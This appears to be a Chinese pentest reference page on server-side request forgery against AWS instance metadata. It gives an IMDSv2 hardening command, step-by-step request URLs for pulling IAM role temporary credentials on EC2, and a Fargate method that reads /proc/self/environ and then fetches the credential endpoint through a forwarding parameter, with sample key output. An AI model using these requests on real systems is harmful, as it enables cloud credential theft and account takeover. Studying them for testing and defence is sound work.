跳转至

AWS - 元数据 SSRF (Metadata SSRF)

AWS 发布了针对该攻击的额外安全防御措施。

⚠ 仅适用于 IMDSv1。

启用 IMDSv2 (Enabling IMDSv2)

aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required

为了使用 IMDSv2,你必须提供一个令牌。

export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"

Elastic Cloud Compute (EC2) 的方法 (Method for EC2)

Amazon 提供了一项内部服务,允许每台 EC2 实例查询和检索有关主机的元数据。如果你发现 EC2 实例上运行着 SSRF 漏洞,请尝试从 169.254.169.254 获取内容。

  1. 访问 IAM : http://169.254.169.254/latest/meta-data/

    ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
iam/
identity-credentials/
instance-action
instance-id

  2. 找到分配给实例的角色名称 : http://169.254.169.254/latest/meta-data/iam/security-credentials/

  3. 提取角色的临时密钥 : http://169.254.169.254/latest/meta-data/iam/security-credentials//

    {
"Code" : "Success",
"LastUpdated" : "2019-07-31T23:08:10Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIAREDACTEDXXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXXXX",
"Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv",
"Expiration" : "2019-08-01T05:20:30Z"
}

容器服务 (Fargate) 的方法 (Method for Container Service)

  1. https://awesomeapp.com/download?file=/proc/self/environ 提取 AWS_CONTAINER_CREDENTIALS_RELATIVE_URI 变量

    JAVA_ALPINE_VERSION=8.212.04-r0
HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2
ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd

  2. 使用凭据 URL 转储 AccessKey(访问密钥)和 SecretKey(私有密钥): https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447

    {
    "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role",
    "AccessKeyId": "ASIAXXXXXXXXXX",
    "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt",
    "Token": "FQoGZXIvYXdzEMj/////...jHsYXsBQ==",
    "Expiration": "2019-09-18T04:05:59Z"
}

返回凭据的 AWS API 调用 (AWS API calls that return credentials)

参考资料 (References)